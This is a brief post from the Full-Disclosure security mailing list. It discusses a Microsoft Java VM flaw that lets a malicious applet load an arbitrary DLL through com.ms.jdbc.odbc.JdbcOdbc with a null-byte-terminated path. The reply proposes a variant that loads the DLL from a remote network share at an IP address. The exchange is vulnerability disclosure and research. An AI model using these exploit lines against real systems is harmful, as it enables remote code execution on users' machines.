Jouko Pynnonen wrote:
>
> can be freely chosen by a malicious applet. For instance to load the DLL
> "C:\mydll.dll" the applet can do
>
> new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");
>
Does
new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
work?
Georgi Guninski
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
